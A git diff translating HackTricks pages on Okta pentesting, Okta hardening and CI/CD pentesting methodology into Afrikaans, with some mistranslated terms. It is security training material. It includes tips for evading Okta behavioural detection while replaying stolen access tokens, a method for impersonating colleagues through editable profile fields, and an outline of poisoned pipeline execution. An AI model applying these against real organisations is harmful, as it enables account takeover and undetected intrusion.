+Daarom, as die app die veld **`userName`** vertrou, sal jy waarskynlik nie in staat wees om dit te verander nie (omdat jy gewoonlik nie daardie veld kan verander nie), maar as dit vertrou byvoorbeeld **`primaryEmail`** kan jy dalk **dit na 'n kollega se e-pos adres verander** en dit na doen (jy sal toegang tot die e-pos moet hê en die verandering moet aanvaar).
 
-Note that this impersoantion depends on how each application was condigured. Only the ones trusting the field you modified and accepting updates will be compromised.\
-Therefore, the app should have this field enabled if it exists:
+Let daarop dat hierdie nabootsing afhang van hoe elke toepassing geconfigureer is. Slegs diegene wat die veld wat jy gewysig het vertrou en opdaterings aanvaar, sal gekompromitteer word.\
+Daarom moet die app hierdie veld geaktiveer hê as dit bestaan:
 
 <figure><img src="../../images/image (175).png" alt=""><figcaption></figcaption></figure>
 
-I have also seen other apps that were vulnerable but didn't have that field in the Okta settings (at the end different apps are configured differently).
+Ek het ook ander toepassings gesien wat kwesbaar was maar nie daardie veld in die Okta instellings gehad het nie (aan die einde is verskillende toepassings anders geconfigureer).
 
-The best way to find out if you could impersonate anyone on each app would be to try it!
+Die beste manier om uit te vind of jy iemand op elke app kan naboots, sal wees om dit te probeer!
 
 ## Evading behavioural detection policies <a href="#id-9fde" id="id-9fde"></a>
 
-Behavioral detection policies in Okta might be unknown until encountered, but **bypassing** them can be achieved by **targeting Okta applications directly**, avoiding the main Okta dashboard. With an **Okta access token**, replay the token at the **application-specific Okta URL** instead of the main login page.
+Gedragsdeteksiebeleide in Okta mag onbekend wees totdat dit teëgekom word, maar **omseiling** daarvan kan bereik word deur **Okta toepassings direk te teiken**, wat die hoof Okta dashboard vermy. Met 'n **Okta toegangstoken**, herhaal die token by die **toepassing-spesifieke Okta URL** in plaas van die hoof aanmeldblad.
 
-Key recommendations include:
+Belangrike aanbevelings sluit in:
 
-- **Avoid using** popular anonymizer proxies and VPN services when replaying captured access tokens.
-- Ensure **consistent user-agent strings** between the client and replayed access tokens.
-- **Refrain from replaying** tokens from different users from the same IP address.
-- Exercise caution when replaying tokens against the Okta dashboard.
-- If aware of the victim company's IP addresses, **restrict traffic** to those IPs or their range, blocking all other traffic.
+- **Vermy die gebruik van** gewilde anonymiseringsproxies en VPN-dienste wanneer jy vasgevange toegangstokens herhaal.
+- Verseker **konstante gebruikers-agent strings** tussen die kliënt en herhaalde toegangstokens.
+- **Wees versigtig om tokens** van verskillende gebruikers vanaf dieselfde IP-adres te herhaal.
+- Wees versigtig wanneer jy tokens teen die Okta dashboard herhaal.
+- As jy bewus is van die slagoffer maatskappy se IP-adresse, **beperk verkeer** na daardie IP's of hul reeks, en blokkeer alle ander verkeer.
 
 ## Okta Hardening
 
-Okta has a lot of possible configurations, in this page you will find how to review them so they are as secure as possible:
+Okta het baie moontlike konfigurasies, op hierdie bladsy sal jy vind hoe om dit te hersien sodat dit so veilig as moontlik is:
 
 {{#ref}}
 okta-hardening.md
@@ -112,7 +112,3 @@ okta-hardening.md
 - [https://medium.com/nickvangilder/okta-for-red-teamers-perimeter-edition-c60cb8d53f23](https://medium.com/nickvangilder/okta-for-red-teamers-perimeter-edition-c60cb8d53f23)
 
 {{#include ../../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-ci-cd/okta-security/okta-hardening.md b/src/pentesting-ci-cd/okta-security/okta-hardening.md
index a7dac96a7..5ca5a88f5 100644
--- a/src/pentesting-ci-cd/okta-security/okta-hardening.md
+++ b/src/pentesting-ci-cd/okta-security/okta-hardening.md
@@ -6,72 +6,72 @@
 
 ### People
 
-From an attackers perspective, this is super interesting as you will be able to see **all the users registered**, their **email** addresses, the **groups** they are part of, **profiles** and even **devices** (mobiles along with their OSs).
+Vanuit 'n aanvaller se perspektief is dit baie interessant omdat jy **alle geregistreerde gebruikers** kan sien, hul **e-pos** adresse, die **groepe** waarvan hulle deel is, **profiele** en selfs **toestelle** (mobiele saam met hul OS's).
 
-For a whitebox review check that there aren't several "**Pending user action**" and "**Password reset**".
+Vir 'n whitebox hersiening, kyk dat daar nie verskeie "**Wagtende gebruiker aksie**" en "**Wagwoord herstel**" is nie.
 
 ### Groups
 
-This is where you find all the created groups in Okta. it's interesting to understand the different groups (set of **permissions**) that could be granted to **users**.\
-It's possible to see the **people included inside groups** and **apps assigned** to each group.
+Hier vind jy al die geskepte groepe in Okta. Dit is interessant om die verskillende groepe (stel van **toestemmings**) te verstaan wat aan **gebruikers** toegeken kan word.\
+Dit is moontlik om die **mense ingesluit in groepe** en **apps toegeken** aan elke groep te sien.
 
-Ofc, any group with the name of **admin** is interesting, specially the group **Global Administrators,** check the members to learn who are the most privileged members.
+Natuurlik is enige groep met die naam **admin** interessant, veral die groep **Global Administrators,** kyk na die lede om te leer wie die mees bevoorregte lede is.
 
-From a whitebox review, there **shouldn't be more than 5 global admins** (better if there are only 2 or 3).
+Vanuit 'n whitebox hersiening, daar **moet nie meer as 5 globale admins wees nie** (beter as daar net 2 of 3 is).
 
 ### Devices
 
-Find here a **list of all the devices** of all the users. You can also see if it's being **actively managed** or not.
+Vind hier 'n **lys van al die toestelle** van al die gebruikers. Jy kan ook sien of dit **aktief bestuur** word of nie.
 
 ### Profile Editor
 
-Here is possible to observe how key information such as first names, last names, emails, usernames... are shared between Okta and other applications. This is interesting because if a user can **modify in Okta a field** (such as his name or email) that then is used by an **external application** to **identify** the user, an insider could try to **take over other accounts**.
+Hier is dit moontlik om te observeer hoe sleutel-inligting soos voorname, vanname, e-pos, gebruikersname... tussen Okta en ander toepassings gedeel word. Dit is interessant omdat as 'n gebruiker **'n veld in Okta kan wysig** (soos sy naam of e-pos) wat dan deur 'n **eksterne toepassing** gebruik word om die gebruiker te **identifiseer**, kan 'n insider probeer om **ander rekeninge oor te neem**.
 
-Moreover, in the profile **`User (default)`** from Okta you can see **which fields** each **user** has and which ones are **writable** by users. If you cannot see the admin panel, just go to **update your profile** information and you will see which fields you can update (note that to update an email address you will need to verify it).
+Boonop, in die profiel **`User (default)`** van Okta kan jy **watter velde** elke **gebruiker** het en watter een **skryfbaar** is deur gebruikers. As jy nie die admin paneel kan sien nie, gaan net na **opdateer jou profiel** inligting en jy sal sien watter velde jy kan opdateer (let daarop dat jy 'n e-pos adres moet verifieer om dit op te dateer).
 
 ### Directory Integrations
 
-Directories allow you to import people from existing sources. I guess here you will see the users imported from other directories.
+Gidsen laat jou toe om mense van bestaande bronne te importeer. Ek raai hier sal jy die gebruikers sien wat van ander gidse geïmporteer is.
 
-I haven't seen it, but I guess this is interesting to find out **other directories that Okta is using to import users** so if you **compromise that directory** you could set some attributes values in the users created in Okta and **maybe compromise the Okta env**.
+Ek het dit nie gesien nie, maar ek raai dit is interessant om uit te vind **ander gidse wat Okta gebruik om gebruikers te importeer** sodat as jy **daardie gids kompromitteer** kan jy sekere attribuutwaardes in die gebruikers geskep in Okta stel en **miskien die Okta omgewing kompromitteer**.
 
 ### Profile Sources
 
-A profile source is an **application that acts as a source of truth** for user profile attributes. A user can only be sourced by a single application or directory at a time.
+'n Profielbron is 'n **toepassing wat as 'n bron van waarheid** vir gebruikersprofielattribuut dien. 'n Gebruiker kan slegs deur 'n enkele toepassing of gids op 'n slag verkry word.
 
-I haven't seen it, so any information about security and hacking regarding this option is appreciated.
+Ek het dit nie gesien nie, so enige inligting oor sekuriteit en hacking rakende hierdie opsie word waardeer.
 
 ## Customizations
 
 ### Brands
 
-Check in the **Domains** tab of this section the email addresses used to send emails and the custom domain inside Okta of the company (which you probably already know).
+Kyk in die **Domeine** oortjie van hierdie afdeling die e-pos adresse wat gebruik word om e-posse te stuur en die pasgemaakte domein binne Okta van die maatskappy (wat jy waarskynlik al weet).
 
-Moreover, in the **Setting** tab, if you are admin, you can "**Use a custom sign-out page**" and set a custom URL.
+Boonop, in die **Instelling** oortjie, as jy admin is, kan jy "**Gebruik 'n pasgemaakte aftekenbladsy**" en 'n pasgemaakte URL stel.
 
 ### SMS
 
-Nothing interesting here.
+Niks interessant hier nie.
 
 ### End-User Dashboard
 
-You can find here applications configured, but we will see the details of those later in a different section.
+Jy kan hier toepassings vind wat geconfigureer is, maar ons sal die besonderhede van daardie later in 'n ander afdeling sien.
 
 ### Other
 
-Interesting setting, but nothing super interesting from a security point of view.
+Interessante instelling, maar niks super interessant vanuit 'n sekuriteitsoogpunt nie.
 
 ## Applications
 
 ### Applications
 
-Here you can find all the **configured applications** and their details: Who has access to them, how is it configured (SAML, OPenID), URL to login, the mappings between Okta and the application...
+Hier kan jy al die **geconfigureerde toepassings** en hul besonderhede vind: Wie toegang tot hulle het, hoe dit geconfigureer is (SAML, OPenID), URL om aan te meld, die mappings tussen Okta en die toepassing...
 
-In the **`Sign On`** tab there is also a field called **`Password reveal`** that would allow a user to **reveal his password** when checking the application settings. To check the settings of an application from the User Panel, click the 3 dots:
+In die **`Sign On`** oortjie is daar ook 'n veld genaamd **`Password reveal`** wat 'n gebruiker sou toelaat om sy **wagwoord te onthul** wanneer hy die toepassingsinstellings nagaan. Om die instellings van 'n toepassing vanaf die Gebruiker Paneel te kontroleer, klik op die 3 punte:
 
 <figure><img src="../../images/image (283).png" alt=""><figcaption></figcaption></figure>
 
-And you could see some more details about the app (like the password reveal feature, if it's enabled):
+En jy kan 'n paar meer besonderhede oor die app sien (soos die wagwoord onthul funksie, as dit geaktiveer is):
 
 <figure><img src="../../images/image (220).png" alt=""><figcaption></figcaption></figure>
 
@@ -79,125 +79,121 @@ And you could see some more details about the app (like the password reveal feat
 
 ### Access Certifications
 
-Use Access Certifications to create audit campaigns to review your users' access to resources periodically and approve or revoke access automatically when required.
+Gebruik Toegang Sertifikasies om ouditveldtogte te skep om jou gebruikers se toegang tot hulpbronne periodiek te hersien en toegang outomaties goed te keur of te herroep wanneer nodig.
 
-I haven't seen it used, but I guess that from a defensive point of view it's a nice feature.
+Ek het dit nie gesien nie, maar ek raai dat dit vanuit 'n defensiewe perspektief 'n mooi funksie is.
 
 ## Security
 
 ### General
 
-- **Security notification emails**: All should be enabled.
-- **CAPTCHA integration**: It's recommended to set at least the invisible reCaptcha
-- **Organization Security**: Everything can be enabled and activation emails shouldn't last long (7 days is ok)
-- **User enumeration prevention**: Both should be enabled
-  - Note that User Enumeration Prevention doesn't take effect if either of the following conditions are allowed (See [User management](https://help.okta.com/oie/en-us/Content/Topics/users-groups-profiles/usgp-main.htm) for more information):
-    - Self-Service Registration
-    - JIT flows with email authentication
-- **Okta ThreatInsight settings**: Log and enforce security based on threat level
+- **Sekuriteits kennisgewing e-posse**: Alle moet geaktiveer wees.
+- **CAPTCHA integrasie**: Dit word aanbeveel om ten minste die onsigbare reCaptcha in te stel.
+- **Organisasie Sekuriteit**: Alles kan geaktiveer word en aktivering e-posse moet nie lank neem nie (7 dae is reg).
+- **Gebruiker enumerasie voorkoming**: Albei moet geaktiveer wees.
+- Let daarop dat Gebruiker Enumerasie Voorkoming nie in werking tree as enige van die volgende toestande toegelaat word nie (sien [Gebruiker bestuur](https://help.okta.com/oie/en-us/Content/Topics/users-groups-profiles/usgp-main.htm) vir meer inligting):
+- Selfdiens Registrasie
+- JIT vloei met e-pos verifikasie
+- **Okta ThreatInsight instellings**: Log en handhaaf sekuriteit gebaseer op bedreigingsvlak.
 
 ### HealthInsight
 
-Here is possible to find correctly and **dangerous** configured **settings**.
+Hier is dit moontlik om korrek en **gevaarlike** geconfigureerde **instellings** te vind.
 
 ### Authenticators
 
-Here you can find all the authentication methods that a user could use: Password, phone, email, code, WebAuthn... Clicking in the Password authenticator you can see the **password policy**. Check that it's strong.
+Hier kan jy al die autentikasie metodes vind wat 'n gebruiker kan gebruik: Wagwoord, telefoon, e-pos, kode, WebAuthn... Klik op die Wagwoord autentiseerder en jy kan die **wagwoord beleid** sien. Kyk dat dit sterk is.
 
-In the **Enrollment** tab you can see how the ones that are required or optinal:
+In die **Registrasie** oortjie kan jy sien hoe diegene wat vereis of opsioneel is:
 
 <figure><img src="../../images/image (143).png" alt=""><figcaption></figcaption></figure>
 
-It's recommendatble to disable Phone. The strongest ones are probably a combination of password, email and WebAuthn.
+Dit word aanbeveel om Telefoon te deaktiveer. Die sterkste is waarskynlik 'n kombinasie van wagwoord, e-pos en WebAuthn.
 
 ### Authentication policies
 
-Every app has an authentication policy. The authentication policy verifies that users who try to sign in to the app meet specific conditions, and it enforces factor requirements based on those conditions.
+Elke app het 'n autentikasiebeleid. Die autentikasiebeleid verifieer dat gebruikers wat probeer om in te teken op die app aan spesifieke voorwaardes voldoen, en dit handhaaf faktor vereistes gebaseer op daardie voorwaardes.
 
-Here you can find the **requirements to access each application**. It's recommended to request at least password and another method for each application. But if as attacker you find something more weak you might be able to attack it.
+Hier kan jy die **vereistes om toegang tot elke toepassing** te verkry vind. Dit word aanbeveel om ten minste wagwoord en 'n ander metode vir elke toepassing te vra. Maar as jy as aanvaller iets meer swak vind, kan jy dalk dit aanval.
 
 ### Global Session Policy
 
-Here you can find the session policies assigned to different groups. For example:
+Hier kan jy die sessiebeleide vind wat aan verskillende groepe toegeken is. Byvoorbeeld:
 
 <figure><img src="../../images/image (245).png" alt=""><figcaption></figcaption></figure>
 
-It's recommended to request MFA, limit the session lifetime to some hours, don't persis session cookies across browser extensions and limit the location and Identity Provider (if this is possible). For example, if every user should be login from a country you could only allow this location.
+Dit word aanbeveel om MFA te vra, die sessie lewensduur tot 'n paar ure te beperk, nie sessie koekies oor blaaiers te persisteer nie en die ligging en Identiteitsverskaffer te beperk (as dit moontlik is). Byvoorbeeld, as elke gebruiker van 'n land moet aanmeld, kan jy net hierdie ligging toelaat.
 
 ### Identity Providers
 
-Identity Providers (IdPs) are services that **manage user accounts**. Adding IdPs in Okta enables your end users to **self-register** with your custom applications by first authenticating with a social account or a smart card.
+Identiteitsverskaffers (IdPs) is dienste wat **gebruikersrekeninge bestuur**. Om IdPs in Okta by te voeg, stel jou eindgebruikers in staat om **self te registreer** met jou pasgemaakte toepassings deur eers met 'n sosiale rekening of 'n slimkaart te autentiseer.
 
-On the Identity Providers page, you can add social logins (IdPs) and configure Okta as a service provider (SP) by adding inbound SAML. After you've added IdPs, you can set up routing rules to direct users to an IdP based on context, such as the user's location, device, or email domain.
+Op die Identiteitsverskaffers bladsy kan jy sosiale aanmeldings (IdPs) byvoeg en Okta as 'n diensverskaffer (SP) configureer deur inkomende SAML by te voeg. Nadat jy IdPs bygevoeg het, kan jy roeteringsreëls opstel om gebruikers na 'n IdP te lei gebaseer op konteks, soos die gebruiker se ligging, toestel of e-pos domein.
 
-**If any identity provider is configured** from an attackers and defender point of view check that configuration and **if the source is really trustable** as an attacker compromising it could also get access to the Okta environment.
+**As enige identiteitsverskaffer geconfigureer is** vanuit 'n aanvaller en verdediger se perspektief, kyk daardie konfigurasie en **of die bron regtig betroubaar is** aangesien 'n aanvaller wat dit kompromitteer ook toegang tot die Okta omgewing kan kry.
 
 ### Delegated Authentication
 
-Delegated authentication allows users to sign in to Okta by entering credentials for their organization's **Active Directory (AD) or LDAP** server.
+Gedelegeerde autentikasie laat gebruikers toe om in te teken op Okta deur inligting vir hul organisasie se **Active Directory (AD) of LDAP** bediener in te voer.
 
-Again, recheck this, as an attacker compromising an organizations AD could be able to pivot to Okta thanks to this setting.
+Weereens, herkontroleer dit, aangesien 'n aanvaller wat 'n organisasie se AD kompromitteer, dalk in staat kan wees om na Okta te pivot deur hierdie instelling.
 
 ### Network
 
-A network zone is a configurable boundary that you can use to **grant or restrict access to computers and devices** in your organization based on the **IP address** that is requesting access. You can define a network zone by specifying one or more individual IP addresses, ranges of IP addresses, or geographic locations.
+'n Netwerk sone is 'n konfigureerbare grens wat jy kan gebruik om **toegang tot rekenaars en toestelle** in jou organisasie te **verleen of te beperk** gebaseer op die **IP adres** wat toegang versoek. Jy kan 'n netwerk sone definieer deur een of meer individuele IP adresse, reekse van IP adresse, of geografiese liggings te spesifiseer.
 
-After you define one or more network zones, you can **use them in Global Session Policies**, **authentication policies**, VPN notifications, and **routing rules**.
+Nadat jy een of meer netwerk zones gedefinieer het, kan jy **dit in Globale Sessie Beleide**, **autentikasiebeleide**, VPN kennisgewings, en **roeteringsreëls** gebruik.
 
-From an attackers perspective it's interesting to know which Ps are allowed (and check if any **IPs are more privileged** than others). From an attackers perspective, if the users should be accessing from an specific IP address or region check that this feature is used properly.
+Vanuit 'n aanvaller se perspektief is dit interessant om te weet watter Ps toegelaat word (en kyk of enige **IPs meer bevoorreg** is as ander). Vanuit 'n aanvaller se perspektief, as die gebruikers van 'n spesifieke IP adres of streek moet toegang hê, kyk of hierdie funksie behoorlik gebruik word.
 
 ### Device Integrations
 
-- **Endpoint Management**: Endpoint management is a condition that can be applied in an authentication policy to ensure that managed devices have access to an application.
-  - I haven't seen this used yet. TODO
-- **Notification services**: I haven't seen this used yet. TODO
+- **Endpoint Management**: Eindpuntbestuur is 'n voorwaarde wat in 'n autentikasiebeleid toegepas kan word om te verseker dat bestuurde toestelle toegang tot 'n toepassing het.
+- Ek het dit nog nie gesien nie. TODO
+- **Kennisgewing dienste**: Ek het dit nog nie gesien nie. TODO
 
 ### API
 
-You can create Okta API tokens in this page, and see the ones that have been **created**, theirs **privileges**, **expiration** time and **Origin URLs**. Note that an API tokens are generated with the permissions of the user that created the token and are valid only if the **user** who created them is **active**.
+Jy kan Okta API tokens op hierdie bladsy skep, en diegene sien wat **gecreëer** is, hul **privileges**, **verval** tyd en **Oorsprong URL's**. Let daarop dat 'n API token gegenereer word met die toestemmings van die gebruiker wat die token geskep het en slegs geldig is as die **gebruiker** wat dit geskep het **aktief** is.
 
-The **Trusted Origins** grant access to websites that you control and trust to access your Okta org through the Okta API.
+Die **Betroubare Oorspronge** verleen toegang tot webwerwe wat jy beheer en vertrou om toegang tot jou Okta org deur die Okta API te verkry.
 
-There shuoldn't be a lot of API tokens, as if there are an attacker could try to access them and use them.
+Daar moet nie baie API tokens wees nie, aangesien as daar is, kan 'n aanvaller probeer om toegang tot hulle te kry en hulle te gebruik.
 
 ## Workflow
 
 ### Automations
 
-Automations allow you to create automated actions that run based on a set of trigger conditions that occur during the lifecycle of end users.
+Automatiserings laat jou toe om geoutomatiseerde aksies te skep wat loop gebaseer op 'n stel van trigger toestande wat tydens die lewensiklus van eindgebruikers voorkom.
 
-For example a condition could be "User inactivity in Okta" or "User password expiration in Okta" and the action could be "Send email to the user" or "Change user lifecycle state in Okta".
+Byvoorbeeld, 'n toestand kan wees "Gebruiker inaktiwiteit in Okta" of "Gebruiker wagwoord vervaldatum in Okta" en die aksie kan wees "Stuur e-pos aan die gebruiker" of "Verander gebruiker se lewensiklus toestand in Okta".
 
 ## Reports
 
 ### Reports
 
-Download logs. They are **sent** to the **email address** of the current account.
+Laai logs af. Hulle word **gestuur** na die **e-pos adres** van die huidige rekening.
 
 ### System Log
 
-Here you can find the **logs of the actions performed by users** with a lot of details like login in Okta or in applications through Okta.
+Hier kan jy die **logs van die aksies uitgevoer deur gebruikers** vind met baie besonderhede soos aanmelding in Okta of in toepassings deur Okta.
 
 ### Import Monitoring
 
-This can **import logs from the other platforms** accessed with Okta.
+Dit kan **logs van die ander platforms** wat met Okta toegang het, **importeer**.
 
 ### Rate limits
 
-Check the API rate limits reached.
+Kyk die API koers beperkings wat bereik is.
 
 ## Settings
 
 ### Account
 
-Here you can find **generic information** about the Okta environment, such as the company name, address, **email billing contact**, **email technical contact** and also who should receive Okta updates and which kind of Okta updates.
+Hier kan jy **generiese inligting** oor die Okta omgewing vind, soos die maatskappy se naam, adres, **e-pos faktuur kontak**, **e-pos tegniese kontak** en ook wie Okta opdaterings moet ontvang en watter soort Okta opdaterings.
 
 ### Downloads
 
-Here you can download Okta agents to sync Okta with other technologies.
+Hier kan jy Okta agente aflaai om Okta met ander tegnologieë te sinkroniseer.
 
 {{#include ../../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-ci-cd/pentesting-ci-cd-methodology.md b/src/pentesting-ci-cd/pentesting-ci-cd-methodology.md
index 41899af04..f065fbf50 100644
--- a/src/pentesting-ci-cd/pentesting-ci-cd-methodology.md
+++ b/src/pentesting-ci-cd/pentesting-ci-cd-methodology.md
@@ -1,4 +1,4 @@
-# Pentesting CI/CD Methodology
+# Pentesting CI/CD Metodologie
 
 {{#include ../banners/hacktricks-training.md}}
 
@@ -6,103 +6,99 @@
 
 ## VCS
 
-VCS stands for **Version Control System**, this systems allows developers to **manage their source code**. The most common one is **git** and you will usually find companies using it in one of the following **platforms**:
+VCS staan vir **Version Control System**, hierdie stelsels laat ontwikkelaars toe om **hulle bronkode te bestuur**. Die mees algemene een is **git** en jy sal gewoonlik maatskappye vind wat dit gebruik in een van die volgende **platforms**:
 
 - Github
 - Gitlab
 - Bitbucket
 - Gitea
-- Cloud providers (they offer their own VCS platforms)
+- Cloud verskaffers (hulle bied hul eie VCS-platforms aan)
 
-## CI/CD Pipelines
+## CI/CD Pypelines
 
-CI/CD pipelines enable developers to **automate the execution of code** for various purposes, including building, testing, and deploying applications. These automated workflows are **triggered by specific actions**, such as code pushes, pull requests, or scheduled tasks. They are useful for streamlining the process from development to production.
+CI/CD pypelines stel ontwikkelaars in staat om **die uitvoering van kode te outomatiseer** vir verskeie doeleindes, insluitend bou, toets en ontplooi van toepassings. Hierdie geoutomatiseerde werksvloei word **geaktiveer deur spesifieke aksies**, soos kode stoot, trek versoeke, of geskeduleerde take. Hulle is nuttig om die proses van ontwikkeling na produksie te stroomlyn.
 
-However, these systems need to be **executed somewhere** and usually with **privileged credentials to deploy code or access sensitive information**.
+Egter, hierdie stelsels moet **ergens uitgevoer word** en gewoonlik met **bevoorregte akrediteer om kode te ontplooi of toegang tot sensitiewe inligting te verkry**.
 
-## VCS Pentesting Methodology
+## VCS Pentesting Metodologie
 
 > [!NOTE]
-> Even if some VCS platforms allow to create pipelines for this section we are going to analyze only potential attacks to the control of the source code.
+> Alhoewel sommige VCS-platforms toelaat om pypelines te skep, gaan ons in hierdie afdeling slegs potensiële aanvalle op die beheer van die bronkode analiseer.
 
-Platforms that contains the source code of your project contains sensitive information and people need to be very careful with the permissions granted inside this platform. These are some common problems across VCS platforms that attacker could abuse:
+Platforms wat die bronkode van jou projek bevat, bevat sensitiewe inligting en mense moet baie versigtig wees met die toestemmings wat binne hierdie platform toegestaan word. Dit is 'n paar algemene probleme oor VCS-platforms wat aanvallers kan misbruik:
 
-- **Leaks**: If your code contains leaks in the commits and the attacker can access the repo (because it's public or because he has access), he could discover the leaks.
-- **Access**: If an attacker can **access to an account inside the VCS platform** he could gain **more visibility and permissions**.
-  - **Register**: Some platforms will just allow external users to create an account.
-  - **SSO**: Some platforms won't allow users to register, but will allow anyone to access with a valid SSO (so an attacker could use his github account to enter for example).
-  - **Credentials**: Username+Pwd, personal tokens, ssh keys, Oauth tokens, cookies... there are several kind of tokens a user could steal to access in some way a repo.
-- **Webhooks**: VCS platforms allow to generate webhooks. If they are **not protected** with non visible secrets an **attacker could abuse them**.
-  - If no secret is in place, the attacker could abuse the webhook of the third party platform
-  - If the secret is in the URL, the same happens and the attacker also have the secret
-- **Code compromise:** If a malicious actor has some kind of **write** access over the repos, he could try to **inject malicious code**. In order to be successful he might need to **bypass branch protections**. These actions can be performed with different goals in mid:
-  - Compromise the main branch to **compromise production**.
-  - Compromise the main (or other branches) to **compromise developers machines** (as they usually execute test, terraform or other things inside the repo in their machines).
-  - **Compromise the pipeline** (check next section)
+- **Lekke**: As jou kode lekke in die verbintenisse bevat en die aanvaller toegang tot die repo kan verkry (omdat dit publiek is of omdat hy toegang het), kan hy die lekke ontdek.
+- **Toegang**: As 'n aanvaller **toegang tot 'n rekening binne die VCS-platform** kan verkry, kan hy **meer sigbaarheid en toestemmings** verkry.
+- **Registrasie**: Sommige platforms sal net eksterne gebruikers toelaat om 'n rekening te skep.
+- **SSO**: Sommige platforms sal nie gebruikers toelaat om te registreer nie, maar sal enigeen toelaat om toegang te verkry met 'n geldige SSO (so 'n aanvaller kan sy github-rekening gebruik om in te gaan byvoorbeeld).
+- **Akrediteer**: Gebruikersnaam+Pwd, persoonlike tokens, ssh sleutels, Oauth tokens, koekies... daar is verskeie tipes tokens wat 'n gebruiker kan steel om op een of ander manier toegang tot 'n repo te verkry.
+- **Webhooks**: VCS-platforms laat toe om webhooks te genereer. As hulle **nie beskerm** is met nie-sigtbare geheime nie, kan 'n **aanvaller dit misbruik**.
+- As daar geen geheim is nie, kan die aanvaller die webhook van die derdeparty-platform misbruik.
+- As die geheim in die URL is, gebeur dieselfde en die aanvaller het ook die geheim.
+- **Kode kompromie:** As 'n kwaadwillige akteur 'n soort **skryf** toegang oor die repos het, kan hy probeer om **kwaadwillige kode in te spuit**. Om suksesvol te wees, mag hy moet **tak beskermings omseil**. Hierdie aksies kan met verskillende doelwitte in gedagte uitgevoer word:
+- Kompromitteer die hooftak om **produksie te kompromitteer**.
+- Kompromitteer die hoof (of ander takke) om **ontwikkelaars se masjiene te kompromitteer** (aangesien hulle gewoonlik toets, terraform of ander dinge binne die repo op hul masjiene uitvoer).
+- **Kompromitteer die pypeline** (kyk na die volgende afdeling)
 
-## Pipelines Pentesting Methodology
+## Pypelines Pentesting Metodologie
 
-The most common way to define a pipeline, is by using a **CI configuration file hosted in the repository** the pipeline builds. This file describes the order of executed jobs, conditions that affect the flow, and build environment settings.\
-These files typically have a consistent name and format, for example — Jenkinsfile (Jenkins), .gitlab-ci.yml (GitLab), .circleci/config.yml (CircleCI), and the GitHub Actions YAML files located under .github/workflows. When triggered, the pipeline job **pulls the code** from the selected source (e.g. commit / branch), and **runs the commands specified in the CI configuration file** against that code.
+Die mees algemene manier om 'n pypeline te definieer, is deur 'n **CI-konfigurasie lêer wat in die repo gehos is** te gebruik. Hierdie lêer beskryf die volgorde van uitgevoerde werksgeleenthede, toestande wat die vloei beïnvloed, en bou omgewing instellings.\
+Hierdie lêers het tipies 'n konsekwente naam en formaat, byvoorbeeld — Jenkinsfile (Jenkins), .gitlab-ci.yml (GitLab), .circleci/config.yml (CircleCI), en die GitHub Actions YAML-lêers wat onder .github/workflows geleë is. Wanneer geaktiveer, **trek die pypeline werk** die kode van die geselekteerde bron (bv. verbintenis / tak), en **voert die opdragte uit wat in die CI-konfigurasie lêer gespesifiseer is** teen daardie kode.
 
-Therefore the ultimate goal of the attacker is to somehow **compromise those configuration files** or the **commands they execute**.
+Daarom is die uiteindelike doel van die aanvaller om op een of ander manier **daardie konfigurasie lêers** of die **opdragte wat hulle uitvoer** te **kompromitteer**.
 
-### PPE - Poisoned Pipeline Execution
+### PPE - Gevulde Pypeline Uitvoering
 
-The Poisoned Pipeline Execution (PPE) path exploits permissions in an SCM repository to manipulate a CI pipeline and execute harmful commands. Users with the necessary permissions can modify CI configuration files or other files used by the pipeline job to include malicious commands. This "poisons" the CI pipeline, leading to the execution of these malicious commands.
+Die Gevulde Pypeline Uitvoering (PPE) pad benut toestemmings in 'n SCM-repo om 'n CI-pypeline te manipuleer en skadelike opdragte uit te voer. Gebruikers met die nodige toestemmings kan CI-konfigurasie lêers of ander lêers wat deur die pypeline werk gebruik word, wysig om kwaadwillige opdragte in te sluit. Dit "vervuil" die CI-pypeline, wat lei tot die uitvoering van hierdie kwaadwillige opdragte.
 
-For a malicious actor to be successful performing a PPE attack he needs to be able to:
+Vir 'n kwaadwillige akteur om suksesvol 'n PPE-aanval uit te voer, moet hy in staat wees om:
 
-- Have **write access to the VCS platform**, as usually pipelines are triggered when a push or a pull request is performed. (Check the VCS pentesting methodology for a summary of ways to get access).
-  - Note that sometimes an **external PR count as "write access"**.
-- Even if he has write permissions, he needs to be sure he can **modify the CI config file or other files the config is relying on**.
-  - For this, he might need to be able to **bypass branch protections**.
+- **Skryf toegang tot die VCS-platform** te hê, aangesien pypelines gewoonlik geaktiveer word wanneer 'n stoot of 'n trek versoek uitgevoer word. (Kyk na die VCS pentesting metodologie vir 'n opsomming van maniere om toegang te verkry).
+- Let daarop dat soms 'n **eksterne PR as "skryf toegang" tel**.
+- Selfs as hy skryf toestemmings het, moet hy seker wees dat hy die **CI konfigurasie lêer of ander lêers waarop die konfigurasie staatmaak** kan **wysig**.
+- Hiervoor mag hy moet in staat wees om **tak beskermings om te seil**.
 
-There are 3 PPE flavours:
+Daar is 3 PPE variasies:
 
-- **D-PPE**: A **Direct PPE** attack occurs when the actor **modifies the CI config** file that is going to be executed.
-- **I-DDE**: An **Indirect PPE** attack occurs when the actor **modifies** a **file** the CI config file that is going to be executed **relays on** (like a make file or a terraform config).
-- **Public PPE or 3PE**: In some cases the pipelines can be **triggered by users that doesn't have write access in the repo** (and that might not even be part of the org) because they can send a PR.
-  - **3PE Command Injection**: Usually, CI/CD pipelines will **set environment variables** with **information about the PR**. If that value can be controlled by an attacker (like the title of the PR) and is **used** in a **dangerous place** (like executing **sh commands**), an attacker might **inject commands in there**.
+- **D-PPE**: 'n **Direkte PPE** aanval vind plaas wanneer die akteur die **CI konfigurasie** lêer wat gaan uitgevoer word, **wysig**.
+- **I-DDE**: 'n **Indirekte PPE** aanval vind plaas wanneer die akteur 'n **lêer** wat die CI konfigurasie lêer wat gaan uitgevoer word, **afhang** (soos 'n make-lêer of 'n terraform konfigurasie).
+- **Publieke PPE of 3PE**: In sommige gevalle kan die pypelines **geaktiveer word deur gebruikers wat nie skryf toegang in die repo het nie** (en wat dalk nie eens deel van die org is nie) omdat hulle 'n PR kan stuur.
+- **3PE Opdrag Inspuiting**: Gewoonlik sal CI/CD pypelines **omgewing veranderlikes** met **inligting oor die PR** stel. As daardie waarde deur 'n aanvaller beheer kan word (soos die titel van die PR) en is **gebruik** in 'n **gevaarlike plek** (soos die uitvoering van **sh opdragte**), kan 'n aanvaller **opdragte daar in spuit**.
 
-### Exploitation Benefits
+### Exploitatie Voordele
 
